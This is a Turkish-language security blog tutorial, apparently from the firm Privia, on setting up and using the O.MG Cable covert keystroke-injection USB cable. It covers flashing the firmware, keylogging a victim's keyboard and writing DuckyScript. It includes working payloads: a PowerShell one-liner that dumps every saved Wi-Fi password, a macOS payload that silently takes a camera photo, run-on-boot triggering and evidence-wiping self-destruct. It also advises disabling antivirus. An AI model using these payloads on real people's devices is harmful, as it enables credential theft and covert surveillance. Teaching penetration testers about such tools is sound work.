Siber Savaş Akademisi 2025 Yılı Staj Başvuruları Açıldı!
Gelişen teknoloji, siber güvenlik alanında koruma amaçlı yeniliklerin yanı sıra saldırı teknikleri açısından da yeni teknolojik cihazları beraberinde getiriyor. Sıradan bir USB kablo gibi görünen, ancak barındırdığı modüller sayesinde siber güvenlik dünyasında oluşturduğu etkiyle dikkat çeken O.MG Cable, bu cihazların başında geliyor. O.MG Cable’ın teknik özelliklerine ve bu kabloyla yapılabileceklere odaklanan bu yazı, siber güvenlik profesyonelleri ve meraklıları için kapsamlı bir bakış sunmayı hedefliyor.
Kısa tanımıyla O.MG Cable, kolay gizlenebilen bir veri toplama ve sızdırma cihazıdır. O.MG Cable, kendi firmware’inde bir web arayüzü barındırır. Cihaz, bu arayüz üzerinden yapılandırılabilir ve arayüz aracılığıyla kurban kullanıcılar, kabloyu cihazlarına bağladıklarında otomatik olarak çalıştırılacak olan komutların ya da senaryoların hazırlanması sağlanır. Sıradan bir kablo gibi görünen bu cihaz, bir bilgisayara veya telefona takıldığında, klavye görevi görerek zararlı işlemler yapabilir. Özellikle siber güvenlik testleri, eğitimler veya araştırmalar için tasarlanmış olan bu araç, işlevselliği sayesinde teknoloji dünyasında oldukça ilgi görür.
O.MG Cable’ın Active End ve Passthrough End olmak üzere iki ucu bulunur.
Siber güvenlik alanında kullanıcılarına güçlü özellikler sunan bir cihaz olan O.MG Cable, bilgi güvenliği alanında faaliyet gösteren bir şirket olan Hak5 internet sitesinden Active ve Passthrough end seçimleri yapılarak satın alınabilir. “Basic” ve “Elite” olmak üzere iki farklı versiyonla sunulan O.MG Cable, Basic versiyonunda 8 payload slot’u ve 120 keys/sec hız sunar. Elite versiyonunda ise bu rakamlar sırasıyla 50-200 payload slot’u ve 890 keys/sec hız olarak belirlenmiştir.
O.MG Cable’ın tüm gelişmiş özelliklerinden faydalanabilmek için öncelikle cihazın yazılım altyapısının hazır hâle getirilmesi gerekir. Kablo, işlevini yerine getirebilmek için, gelişmiş donanımsal özelliklerini yönlendirecek ve kontrol edecek bir yazılıma ihtiyaç duyar. Firmware olmadan kablo sıradan bir USB kablo görevi görecektir. İşte bu noktada firmware kurulumu devreye girer. O.MG Programmer aracılığıyla kabloya yüklenen firmware; kablonun komutları algılamasını, payload’ları çalıştırmasını ve web arayüzü üzerinden yönetilmesini sağlar. Kısacası firmware, O.MG Cable’ın potansiyelini ortaya çıkaran ve onu sıradan bir kablodan güçlü bir siber güvenlik aracına dönüştüren temel bileşendir. O.şu adımlar izlenir:
O.MG Cable firmware kurulumu için paket üzerinde de yazan o.mg.lol/setup adresine erişilir. Açılan sayfada O.MG Cable, Adapter, UnBlocker satırında yer alan INSTRUCTIONS butonuna tıklanır.
Açılan sayfada da görüldüğü üzere. O.MG Cable Firmware kurulumu Web Flasher ve Python Firmware Tool olmak üzere iki şekilde gerçekleştirilebilir.
Web Flasher yöntemiyle kurulum için WEBFLASHER butonuna tıklanır.
Burada kullanıcıyı bir sözleşme karşılar. “I Agree” butonu aktif hale getirmek için sözleşmenin tamamının okunması / scroll edilmesi gerekir. Buton aktif olduğunda, butona tıklanarak devam edilir.
Firmware kurulumu için, görseldeki gibi görünen ve sıradan bir kablo gibi gözüken O.MG Cable’ı kullanıma hazır hâle getiren O.MG Programmer gerekir.
O.MG Programmer üzerinde, 2 adet USB-C, 1 adet USB-A olmak üzere, toplamda 3 adet input portu ve ayrıca PWR, USB, OMG ve ACT olmak üzere 4 adet LED bulunur.
O.MG Programmer, bir aracı kablo yardımıyla, kurulum için PC’ye bağlanır. O.MG Programmer bilgisayara bağlandığında aşağıda görüldüğü üzere, O.MG Programmer üzerindeki PWR ve USB LED’leri yanar.
Ardından O.MG Cable’ın USB-A ucu, O.MG Programmer üzerindeki USB-A portuna takılır. (Bu örnekte kablo olarak USB-A / USB-C kablo kullanılmıştır.) Bu işlemle birlikte aşağıda görüldüğü üzere OMG LED’i yanmaya başlayacaktır.
Bu işlemler yapıldıktan sonra O.MG Programmer artık firmware’i flash’lamak için hazırdır.
Connect aşamasında, browser O.MG Programmer’ı gördükten sonra “Connect” butonuna tıklanır. Connect butonuna tıklandıktan sonra seri bağlantı noktalarını listeleyen bir pop-up çıkacaktır. Çıkan bağlantı noktası seçilir ve “Bağlan” butonuna basılır.
Birçok bilgisayarda O.MG Programmer’ın gerektirdiği CP2102 sürücüsü önceden yüklenmiştir. Eğer bilgisayarda kurulu değilse, CP210x USB to UART Bridge VCP Drivers – Silicon Labs adresinden manuel olarak yüklenmesi gerekir. Bunun için şu adımlar izlenir:
Bağlantıda listelenen sürücüler arasından kullanıcıya uygun olanı indirilir. Örnekte “CP210x Universal Windows Driver” indirilmiştir. Klasörün içindeki “CP210xVCPInstaller_x64.exe” ya da “CP210xVCPInstaller_x32.exe” dosyası çalıştırılır ve kurulum tamamlanır.
Sürücü kurulumu tamamlandıktan sonra, tekrardan WEBFLASHER’a dönülebilir. Flash aşamasında, tercih edilen Firmware Build’i seçilir ve “Program” butonuna basılır. Örnekte, “Stable: v3.0-240928 (Default)” sürümü seçildi. Program butonuna tıklandıktan sonra yükleme barı dolmaya, O.MG Programmer cihazı üzerinde ise, son LED olan ACT ışığı yanıp sönmeye başlar.
Success! aşamasında, kabloya firmware işlemi tamamlanır. Kablo içinde yer alan bir Wi-Fi adaptörü sayesinde, kablo üzerinden Wi-Fi yayını yapılır. Bu yayına bağlanılarak kablonun web arayüzüne ulaşılabilir ve kablonun kontrolü sağlanabilir. Wi-Fi bağlantısı yapmak için pakette yer alan key kullanılabilir.
O.MG Cable’ın Wi-Fi adaptörü; kablonun web arayüzüne erişmek, payload oluşturmak ve cihazı uzaktan yönetmek gibi işlemleri mümkün kılar. Ayrıca, yazıda bahsedileceği üzere kablonun “Geofencing” özelliği de Wi-Fi bağlantısı üzerinden çalışır. Bu özellik sayesinde kablo, belirli bir Wi-Fi ağı algılandığında önceden tanımlanmış komutları otomatik olarak çalıştırabilir.
İndirme sırasında Windows, dosyayı virüs olarak algılayabilir, bunun önüne geçmek için antivirüs yazılımının devre dışı bırakılması önerilir.
Github üzerinde yayımlanmış olan Advanced Flasher kullanılarak da firmware kurulumu gerçekleştirilebilir. Belirtilen URL’den, “Download the latest stable firmware zip file” kısmından güncel stable firmware dosyası indirilir.
CMD üzerinden komut çalıştırmadan önce O.MG Programmer üzerindeki portlara kabloları bağlanır.
Terminal’den “python3 flash.py” komutu çalıştırılır. Herhangi bir tuşa basarak, adım adım sözleşme okunur.
Komutun başarılı bir şekilde çalıştırılabilmesi için sistemde Python 3.7 ya da daha yüksek bir sürümünün yüklü ve “pyserial“ modülünün kurulu olması gerekir. Aksi takdirde hata alınır. “pyserial” modülü kurulumu için aşağıdaki komut kullanılabilir.
python3 -m pip install pyserial
Sözleşme okunduktan sonra onaylanması istenir. Sürece devam edebilmek için “yes” yazılır.
Ardından ilgili portu seçmek amacıyla bir Index numarası girilir ve sürece devam edilir. Aşağıdaki örnekte, “Silicon Labs CP210x USB to UART Bridge (COM6)” ismi ya da Index numarası (1) yazılarak ilerlenmiştir.
Bu kısımda, açıklamaları aşağıda verilen bazı seçenekler görülür.
Amaç firmware kurmak olduğu için, “FLASH NEW FIRMWARE (DEFAULT)” seçeneği seçilir.
Kablonun Wi-Fi modu için Station ve Access Point olmak üzere iki seçenek vardır. Access Point seçilmesi tavsiye edilir.
İlerleyen ekranda Wi-Fi SSID girilmesi beklenir. Örnekte SSID değeri “Privia” olarak belirlenmiştir. Ardından Wi-Fi parolası belirlenerek sürece devam edilir.
Tüm bu adımlar sırasıyla gerçekleştirildiğinde flash işlemi tamamlanır. Devam etmeden önce cihazın çıkarılıp yeniden takılması gerekir. Yeniden taktıktan sonra Enter tuşuna basılarak devam edilir. Bu aşamaya gelindiğinde firmware kurulmuş, kablo kullanıma hazır hâle gelmiş olur.
Keylogging, bir kullanıcının klavye üzerindeki tuş vuruşlarını kaydetme yöntemidir. Genellikle güvenlik araştırmaları, kullanıcı deneyimi analizleri veya parolaları ve hassas bilgileri elde etmek gibi kötü niyetli amaçlarla kullanılır. O.MG Cable’ın sunduğu bu özellik, cihazın siber güvenlik çalışmalarında etkili bir araç haline gelmesini sağlar. O.MG Cable kurban kullanıcıların klavye girişlerini loglama (keylogging) özelliği sunar.
Keylogging özelliğinin kullanılması için O.MG Cable’ın Active End’i bilgisayara, Passthrough End’i ise klavyeye bağlanır. Aşağıdaki görselde, O.MG Cable’ın Active End’i USB-A, Passthrough End’i USB-C’dir.
Kablo bağlantısı yapıldıktan sonra, firmware kurulumunda belirlenen SSID ile kablonun Wi-Fi ağı tespit edilip, yine kurulum esnasında belirlenen parolayla bu Wi-Fi ağına bağlanılır.
Ağa bağlandıktan sonra “http://192.168.4.1/” adresine gidilir, O.MG paneline giriş yapılır ve KEYLOG kısmına gelinir. Kullanılan her tuş KEYLOG ekranında görünecektir.
KEYLOG kısmında aşağıdaki görselde görüldüğü üzere 4 farklı seçenek mevcuttur:
START: Keylog işlemi başlar.
O.MG Cable’ın en önemli özelliklerinden biri, DuckyScript sayesinde mümkün olan otomatik komut çalıştırma yeteneğidir. Basit ama güçlü bir komut dili olan DuckyScript, klavye girdilerini simüle ederek hedef cihaza hızlı ve otomatik komutlar göndermeyi sağlar. O.MG Cable da bu dili kullanarak, belirlenen komutları hedef cihazda, sanki bir kullanıcı yazıyormuş gibi çalıştırır. Basit yapısı sayesinde hızlıca script yazılabilir, karmaşık işlemler otomatikleştirilebilir ve saldırı senaryoları kolayca test edilebilir. Bu özellik, O.MG Cable’ın pratik ve etkili bir siber güvenlik aracı olmasında büyük rol oynar.
REM komutu, BASIC ve benzeri programlama dillerinde olduğu gibi, DuckyScript™ içinde de yorum satırları eklemek için kullanılır. “REM” ile başlayan satırlar, script çalıştırılırken cihaz tarafından işlenmez; yani, çalıştırılacak bir komut olarak kabul edilmez. Bu satırlar, yalnızca açıklama eklemek veya kodun anlaşılabilirliğini artırmak amacıyla kullanılır.
Kullanım örneği:
REM Sonraki üç satır Windows’ta bir cmd çalıştırır
GUI r
STRING cmd
ENTER
REM_BLOCK komutu, bir yorum satırı oluşturmanın başka bir yoludur; ancak burada yorumlar tek bir satır yerine blok şeklinde yazılır. Blok yorumlar, yorumların birden fazla satıra yayılmasını sağlayarak daha uzun açıklamalar eklemek için idealdir.
Kullanım örneği:
REM_BLOCK Hello,
World!
END_REM
Çeşitli DuckyScript komutlarının DuckyScript ile yeni tanışan kullanıcıların hızlı bir şekilde senaryolar hazırlamasına yardımcı olacak şekilde tasarlan işlevleri ve kullanım örnekleri aşağıda verilmiştir.
Payload çalıştırma sırasında, hedef cihazın dil tuş haritasına (keymap) uyum sağlamak için uygun bir keymap belirtilir. Eğer bir payload içinde özel bir keymap tanımlanırsa, bu tanım O.MG Cable’ın genel ayarlarında yapılandırılmış olan sistem varsayılanını geçersiz kılar. Bu özellik, hedef cihazın dil ayarlarına göre en uygun tuş haritasının kullanılmasını sağlayarak uyumluluğu artırır ve komutların doğru şekilde çalıştırılmasını güvence altına alır.
O.MG Cable, toplamda 191 farklı keymap desteklemektedir. Bu destek; Windows, MacOS ve Linux işletim sistemlerinin tüm tuş haritalarını kapsayacak şekilde geniş bir yelpazeye sahiptir. Bu sayede, farklı dillerdeki ve bölgesel ayarlardaki klavye düzenleri arasında kolayca geçiş yapılabilir. Böylece farklı ülkelerdeki kullanıcılar için geniş bir kullanım kolaylığı sağlanmış olur.
İki karakterli ISO 3166 Alpha-2 kodları mevcutsa, bu standart kodlar kullanılır. Ancak, bu standartla temsil edilemeyen birçok klavye düzeni de bulunmaktadır. Bu tür klavyeler, standart iki harfli kod yerine daha büyük bir kod kullanılarak tanımlanır. Bu kodlarda genellikle bir alt çizgi bulunur.
Kullanım örneği:
DUCKY_LANG US
REM setting the language to US english
DUCKY_LANG FR
REM setting the language to frenchREM all 191 keymaps available:
AR_101, AR_102, AR_FR,…, TR_F, TR_Q, …
DELAY komutu, DuckyScript içinde anlık bir duraklama oluşturarak komut akışına bir süreliğine ara verir. Bu komut, özellikle hedef bilgisayarın art arda gelen komutları işlemesi zaman alacaksa, komutlar arasında kısa bir duraklama oluşturmak için oldukça kullanışlıdır. Bu sayede, komutların beklenenden hızlı bir şekilde gönderilmesi nedeniyle ortaya çıkabilecek hatalar önlenmiş olur ve her adımın doğru bir şekilde tamamlanması sağlanır.
DELAY komutuyla tanımlanan duraklama süresi milisaniye (ms) cinsindendir. Örneğin, “DELAY 1000” ifadesi, 1 saniyelik bir duraklama oluşturur.
Kullanım örneği:
DELAY 500
STRING komutu, ardından gelen metni işleyerek hedef cihazda bir dizi karakter girişi yapılmasını sağlar. STRING komutu ile girilen her karakter, bir klavye girdisi olarak algılanır ve cihazda sanki manuel olarak yazılmış gibi bir işlem gerçekleştirilir. Bu komut, küçük harflerden büyük harflere, rakamlardan özel karakterlere, birçok farklı karakterin gönderilmesine olanak tanır.
STRING komutu, her karakterin otomatik olarak büyük/küçük harf ayarını yapar; örneğin, büyük harflerin gerektiği yerlerde otomatik olarak Shift tuşu kullanılır. Bu özellik, uzun ve karmaşık metin dizilerini yazarken kullanıcıya büyük kolaylık sağlar ve metnin doğru bir şekilde iletilmesini garantiler. Tek bir karakterden uzun bir metin dizisine kadar her türlü karakter dizisi STRING komutu ile iletilebilir.
STRING komutunun kabul ettiği karakterler arasında küçük harfler (a…z), büyük harfler (A…Z), sayılar (0…9) ve !)`~+=_-“‘;:<,>.?[{]}/|!@#$%^&*() gibi birçok özel karakter yer almaktadır. Bu sayede, özel semboller veya karmaşık metinler de kolayca hedef cihaza gönderilebilir.
Kullanım örneği:
GUI r
DELAY 50
STRING notepad.exe
ENTER
DELAY 100
STRING Hello World!
DuckyScript, fare hareketlerini ve tıklamalarını taklit ederek hedef cihazda fare kullanımı simüle edebilir. Bu özellik, script üzerinden fare kontrolü sağlamayı mümkün hâle getirir ve özellikle otomatikleştirilmiş senaryolarda oldukça kullanışlıdır. Farenin farklı butonları belirli sayılarla temsil edilmiştir ve her bir sayı, ilgili fare butonuna karşılık gelir. Fare tuşları, varsayılan olarak aşağıdaki gibi belirlenir:
Kullanım örneği:
MOUSE MOVE [X: +/- INTEGER] [Y: +/- INTEGER]
MOUSE CLICK [MOUSE BUTTON NUMBER 1-15]REM examples
MOUSE MOVE -10000 -10000
REM the mouse will move to the probable 0x0 coordinateMOUSE CLICK 1
REM click the left mouse button
Fare jiggler (fare hareket ettirici) özelliği, ekran kilidinin devreye girmesini önlemek için fareyi belirli aralıklarla hafifçe hareket ettirir. Bu özellik açıkken fare, her 25 saniyede bir rastgele olarak bir piksel sola veya sağa kaydırılır. Bu küçük hareketler, işletim sisteminin ekran koruyucu veya otomatik ekran kilidi gibi özelliklerini devreye sokmasını engelleyerek, ekranın açık kalmasını sağlar.
Kullanım örneği:
JIGGLER ON
JIGGLER OFF
Payload, bir saldırı sırasında hedef sisteme iletilen ve belirli bir işlemi gerçekleştirmek için tasarlanan kod parçacığıdır. Siber güvenlik çalışmalarında; bir sistemin açıklarını tespit etmek, güvenlik katmanlarını aşmak veya belirli komutları uzaktan çalıştırmak için kullanılır. O.MG Cable’ın payload çalıştırma özelliği, sistemlerin güvenlik açıklarını keşfetmek ve savunma mekanizmalarını test etmek açısından son derece önemlidir.
Bilgisayar üzerinde payload çalıştırmak için ilk olarak, kablonun Active End’inin bilgisayara takılması gerekir. Örnek olarak, bilgisayar üzerinde kayıtlı Wi-Fi bağlantılarının parolalarını listeleyen bir payload çalıştırılacaktır.
Kablo bilgisayara takıldıktan sonra, WI-FI üzerinden kabloya erişilir, http://192.168.4.1/ adresine girilir ve “PAYLOAD” kısmına gelinir. Açılan alana, aşağıda örneklendiği gibi, çalıştırılması istenen komutlar yazılır:
Kullanım örneği:
DUCKY_LANG TR_Q
GUI r
DELAY 200
STRING powershell
DELAY 300
ENTER
DELAY 500
STRING (netsh wlan show profiles) | Select-String “\:(.+)$” | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=”$name” key=clear)} | Select-String “Key Content\W+\:(.+)$” | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
DELAY 1000
ENTER
Bu komutlara göre, payload çalıştırıldığında, otomatik olarak Windows “Çalıştır” penceresi açılır. Girdi alanına “powershell” yazılır ve ENTER’a basılır. Devamında açılan powershell’e yukarıdaki payload’da bahsedilen komut yazılır. Bu komutun amacı, cihazda kayıtlı olan Wi-Fi’ları ve parolalarını listelemektir. Komut yazıldıktan sonra, ENTER’a basılır ve komutun çıktısı listelenir.
Süreç boyunca adımlar arası DELAY’ler konmuştur, bu sayede payload optimize edilmiştir.
Android üzerinden veya iOS üzerinden payload çalıştırmak için yürütülen süreç, bilgisayar için olan sürece benzer. Kablonun Active End’i telefona bağlanır. Eğer Active End telefona uyumlu değilse, dönüştürücüler kullanılabilir.
Kablo bilgisayara bağlandıktan sonra, Wi-Fi üzerinden kabloya erişilir, http://192.168.4.1/ adresine gidilir ve “PAYLOAD” kısmına gelinir.
Buraya çalıştırılması istenen komutlar yazılır. Örnekte aşağıdaki payload kullanılmıştır.
TAB
DELAY 250
GUI f
DELAY 350
CTRL l
LEFT
STRING camera
DELAY 300
ENTER
ENTER
DELAY 300
ENTER
ENTER
DELAY 300
ENTER
ENTER
DOWN
ENTER
DOWN
ENTER
Payload yazıldıktan sonra sağ altta bulunan “BUILD + RUN” butonuna tıklanır.
Payload çalıştırıldığında, otomatik olarak “Finder” açılır. Girdi alanına “camera” yazılır ve ENTER’a basılır. Devamında, Kamera uygulaması açılır. Uygulama açıldıktan sonra kısa bir süre kamera için beklenir ve ekranda deklanşör butonu aranır. Buton bulunduktan sonra, ENTER’a basılır ve fotoğraf çekilmiş olur.
Süreç boyunca adımlar arası DELAY’ler konmuştur, bu sayede payload optimize edilmiştir.
File Menu bölümünde, O.MG Cable’a yüklenebilecek çeşitli payload’lar kaydedilebilir. Ancak bu yazının hazırlandığı dönemde, payload ismi belirleme veya yüklenen payload’ları isimlendirme özelliği henüz mevcut değildi. Bu nedenle, payload’lar belirli sayıda ayrılmış slotlara kaydedilir ve bu slotlar üzerinden yönetilir. Kullanıcı, her bir slot için önceden yüklediği payload’lardan birini seçip etkinleştirebilir, ancak içeriklerini daha ayrıntılı tanımlamak için henüz bir etiketleme ya da isimlendirme imkânı sunulmaz.
Bunun yanı sıra, cihazın “Save Bootscript” ve “Run Bootscript” gibi gelişmiş işlevleri de bulunur. Bu özellikler sayesinde, seçilen bir payload, bootscript olarak tanımlanabilir ve cihazın başlatılması esnasında çalıştırılması için kaydedilebilir. Böylelikle cihazın her bağlantısında önceden belirlenmiş olan payload otomatik olarak tetiklenir.
Özellikle “Run on Boot” özelliği aktif hâle getirildiğinde, O.MG Cable takıldığı anda seçilen bootscript devreye girer ve payload otomatik olarak çalışır. Bu fonksiyon, cihazın gizli ve hızlı bir biçimde bir saldırı başlatmasını sağlar ve herhangi bir kullanıcı müdahalesine gerek kalmadan işlem başlatılabilir.
Geofencing özellikleriyle O.MG cihazdaki eylemler tetiklenebilir veya engellenebilir.
Örneğin, O.MG Cable kapsam dahilindeki binanın ön kapısından içeri girene kadar normal bir kablo gibi davranabilir. Veya O.MG cihazı binayı terk ederse, payloadları ve loot’ları temizlemek için kendi kendini imha etme tetiklenebilir.
Örneğin, kablo ofisin dışında herhangi bir bilgisayara ya da telefona takılırsa, payload’u silen ve kabloyu deactive eden komut aşağıdaki gibidir:
IF_NOTPRESENT SSID=”Privia Office”
SELF-DESTRUCT 1
Eğer ofisin içindeyken cihaza takılırsa, komut “I am in the office!” yazar.
IF_PRESENT SSID=”Privia Office”
STRINGLN I am in the office!
Bir 2.4GHz SSID/BSSID görülürse payload’u çalıştırır. Yalnızca bir kez tarama yapar.
IF_PRESENT SSID=”SSIDNAME”
IF_PRESENT BSSID=”AA:BB:CC:DD:EE:FF”
Bir 2.4GHz SSID/BSSID görülmüyorsa payload’u çalıştırır. Yalnızca bir kez tarama yapar.
IF_NOTPRESENT SSID=”SSIDNAME”
IF_NOTPRESENT BSSID=”AA:BB:CC:DD:EE:FF”
Payload’un geri kalanına devam etmeden önce 2.4GHz SSID/BSSID’nin mevcut olmasını bekler.
Zaman aşımı için MINUTES belirtilir, aksi takdirde sonsuza kadar çalışacaktır.
Taramanın ne sıklıkta yapılacağını saniye cinsinden INTERVAL olarak belirtilir. 60 saniyeden daha az bir INTERVAL, çoğu istemcinin WebUI ile bağlantıyı sürdürmesini zorlaştırma eğilimindedir.
WAIT_FOR_PRESENT SSID=”MySSID”
WAIT_FOR_PRESENT BSSID=”AA:BB:CC:DD:EE:FF”
WAIT_FOR_PRESENT SSID=”MySSID” MINUTES=”2” INTERVAL=”90”
WAIT_FOR_PRESENT BSSID=”AA:BB:CC:DD:EE:FF” MINUTES=”2” INTERVAL=”90”
Yükün geri kalanına devam etmeden önce 2.4GHz SSID/BSSID’nin mevcut olmamasını bekler.
Zaman aşımı için MINUTES belirtilir, aksi takdirde sonsuza kadar çalışacaktır.
Taramanın ne sıklıkta yapılacağını saniye cinsinden INTERVAL olarak belirtilir. 60 saniyeden daha az bir INTERVAL, çoğu istemcinin WebUI ile bağlantıyı sürdürmesini zorlaştırma eğilimindedir.
WAIT_FOR_NOTPRESENT SSID=”MySSID”
WAIT_FOR_NOTPRESENT BSSID=”AA:BB:CC:DD:EE:FF”
WAIT_FOR_NOTPRESENT SSID=”MySSID” MINUTES=”2” INTERVAL=”90”
WAIT_FOR_NOTPRESENT BSSID=”AA:BB:CC:DD:EE:FF” MINUTES=”2” INTERVAL=”90”
Self-Destruct, kablonun devre dışı bırakılmasına ve hassas verilerin silinmesine olanak tanır. Tam işlevsellik yalnızca, kablo fiziksel olarak geri kazanıldığında ve ürün yazılımı yeniden yüklendiğinde geri elde edilebilir. O zamana kadar kablo etkisiz hale getirilmiş olarak kalır. Hatta kablonun veri hatlarını keserek “kopuk” görünmesini sağlama seçeneği dahi vardır, bu da hedefi kabloyu atmaya teşvik eder.
Self-Destruct iki yöntemle gerçekleştirilebilir. Bu komutlar, istenen kendini imha biçimini elde etmek için payload’a entegre edilebilir veya [Ayarlar] > [Genel] altındaki WebUI aracılığıyla yürütülebilir.
Tüm verileri tamamen siler ve O.MG kablosunun veri hatlarının “bozuk” görünmesini sağlamak için veri hatlarının bağlantısını keser. Kurtarma için aygıt yazılımının yeniden yüklenmesi gerekir.
SELF-DESTRUCT 1
Tüm verileri siler, ancak normal bir kablo gibi davranması için veri hatlarını bağlı bırakır. Kurtarma için aygıt yazılımının yeniden yüklenmesi gerekir.
SELF-DESTRUCT 2
Bilgi güvenliği alanında faaliyet gösteren bir şirket olan Hak5 internet sitesinden temin edilebilen ve temelde bir veri toplama ve sızdırma cihazı O.MG Cable, normal kablo gibi görünen ancak gelişmiş donanım ve yazılım özellikleriyle siber güvenlik profesyonelleri tarafından sızma testlerinde kullanılan bir cihaz olarak öne çıkıyor. Privia tarafından hazırlanan bu yazı, O.MG Cable’ın çalışır hâle getirilmesi için gereken ayrıntılara kapsamlı bir bakış sunuyor.
Yazar: Onur Bilici
Bunlar İlginizi Çekebilir